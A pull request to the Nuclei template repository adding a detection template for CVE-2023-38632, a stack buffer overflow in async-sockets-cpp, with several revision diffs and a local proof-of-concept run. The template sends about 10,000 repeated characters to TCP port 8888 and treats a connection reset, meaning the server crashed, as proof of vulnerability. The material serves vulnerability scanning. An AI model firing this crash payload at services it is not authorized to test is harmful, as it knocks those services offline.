### PR TITLE
add CVE-2023-38632

### DIFF
--- a/javascript/cves/2023/CVE-2023-38632.yaml
+++ b/javascript/cves/2023/CVE-2023-38632.yaml
@@ -9,7 +9,7 @@ info:
     in tcpsocket.hpp when processing malformed TCP packets.
 
 variables:
-  buffer: '{{repeat("A", rand_int(10000, 10999))}}'
+  buffer: '{{repeat(to_upper(rand_text_alpha(1)), rand_int(10000, 10999))}}'
 
 javascript:
   - pre-condition: isPortOpen(host, port, 10);

--- a/javascript/cves/2023/CVE-2023-38632.yaml
+++ b/javascript/cves/2023/CVE-2023-38632.yaml
@@ -1,0 +1,42 @@
+id: CVE-2023-38632
+
+info:
+  name: CVE-2023-38632
+  author: dwisiswant0
+  severity: critical
+  description: |
+    async-sockets-cpp through 0.3.1 has a stack-based buffer overflow
+    in tcpsocket.hpp when processing malformed TCP packets.
+
+variables:
+  buffer: '{{repeat("A", rand_int(10000, 10999))}}'
+
+javascript:
+  - pre-condition: isPortOpen(host, port, 10);
+    code: |
+      const net = require('nuclei/net');
+      let ok = false;
+      for (let i = 0; i < 10; i++) {
+        try {
+          let conn = net.Open('tcp', `${host}:${port}`);
+          conn.Send(payload);
+          let data = conn.RecvString(3);
+          ok = data === "OK!";
+          conn.Close();
+        } catch(e) {
+          log(e.value);
+          break;
+        }
+      }
+
+    args:
+      host: "{{Host}}"
+      port: "8888"
+      payload: "{{buffer}}"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "success == true"
+          - "regex('connection (refused|reset by peer)', response)"
+        condition: and

--- a/javascript/cves/2023/CVE-2023-38632.yaml
+++ b/javascript/cves/2023/CVE-2023-38632.yaml
@@ -29,10 +29,8 @@ javascript:
           ok = data === "OK!";
           conn.Close();
         } catch(e) {
-          if (i > 0) {
-            err = /connection (refused|reset by peer)/.test(e.value);
-            if (err) break;
-          }
+          err = /connection (refused|reset by peer)/.test(e.value);
+          if (err && i > 0) break;
         }
       }
       vuln = ok && err;

--- a/javascript/cves/2023/CVE-2023-38632.yaml
+++ b/javascript/cves/2023/CVE-2023-38632.yaml
@@ -15,7 +15,9 @@ javascript:
   - pre-condition: isPortOpen(host, port, 10);
     code: |
       const net = require('nuclei/net');
-      let ok = false;
+      let ok = false,
+          err = false,
+          vuln = false;
       for (let i = 0; i < 10; i++) {
         try {
           let conn = net.Open('tcp', `${host}:${port}`);
@@ -24,10 +26,13 @@ javascript:
           ok = data === "OK!";
           conn.Close();
         } catch(e) {
-          log(e.value);
-          break;
+          if (i > 0) {
+            err = /connection (refused|reset by peer)/.test(e.value);
+            if (err) break;
+          }
         }
       }
+      vuln = ok && err;
 
     args:
       host: "{{Host}}"
@@ -37,6 +42,5 @@ javascript:
     matchers:
       - type: dsl
         dsl:
-          - "success == true"
-          - "regex('connection (refused|reset by peer)', response)"
+          - "success && response" # shorthand for 'success == true && response == true'
         condition: and

--- a/javascript/cves/2023/CVE-2023-38632.yaml
+++ b/javascript/cves/2023/CVE-2023-38632.yaml
@@ -7,6 +7,9 @@ info:
   description: |
     async-sockets-cpp through 0.3.1 has a stack-based buffer overflow
     in tcpsocket.hpp when processing malformed TCP packets.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-38632
+    - https://github.com/eminfedar/async-sockets-cpp/issues/31
 
 variables:
   buffer: '{{repeat(to_upper(rand_text_alpha(1)), rand_int(10000, 10999))}}'


### PR DESCRIPTION
### Template / PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Add CVE-2023-38632
- References:
  - https://nvd.nist.gov/vuln/detail/CVE-2023-38632

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

Proof:

```bash
# tty1
$ wget -q 'https://github.com/Halcy0nic/CVE-2023-38632/raw/main/async-sockets-cpp-master.zip'
$ unzip async-sockets-cpp-master.zip
$ cd async-sockets-cpp-master/examples/
$ make
$ ./tcp-server
```

```console
# tty2
$ nuclei -duc -t CVE-2023-38632.yaml -debug -u http://localhost

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.0.0

		projectdiscovery.io

[ERR] Could not read nuclei-ignore file: open /home/dw1/.config/nuclei/.nuclei-ignore: no such file or directory
[INF] Current nuclei version: v3.0.0 (outdated)
[INF] Current nuclei-templates version:  (latest)
[INF] New templates added in latest release: 21
[INF] Templates loaded for current scan: 1
[WRN] Executing 1 unsigned templates. Use with caution.
[INF] Targets loaded for current scan: 1
[DBG] [CVE-2023-38632] Executing Precondition for request
[DBG]  [CVE-2023-38632] Javascript Code:

	isPortOpen(host, port, 10);

[DBG] [CVE-2023-38632] Precondition for request was satisfied
[JS] read tcp 127.0.0.1:36230->127.0.0.1:8888: read: connection reset by peer
[DBG] [CVE-2023-38632] Dumped Javascript request for localhost:8888:
Variables:
 	1. Port => 8888
	2. host => localhost
	3. payload => AAAAAAAAAAAAAAAAAAAAAAAAA .... AAAAAAAAAAAAAAAAAAAAAAAAA
	4. port => 8888 address=localhost:8888
[DBG]  [CVE-2023-38632] Javascript Code:

	const net = require('nuclei/net');
	let ok = false;
	for (let i = 0; i < 10; i++) {
	    try {
	        let conn = net.Open('tcp', `${host}:${port}`);
	        conn.Send(payload);
	        let data = conn.RecvString(3);
	        ok = data === "OK!";
	        conn.Close();
	    } catch (e) {
	        log(e.value);
	        break;
	    }
	}

[DBG] [CVE-2023-38632] Dumped Javascript response for localhost:8888:
	1. response => read tcp 127.0.0.1:36230- ....  connection reset by peer
	2. success => true address=localhost:8888
[CVE-2023-38632:dsl-1] [js] [critical] localhost:8888
```

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)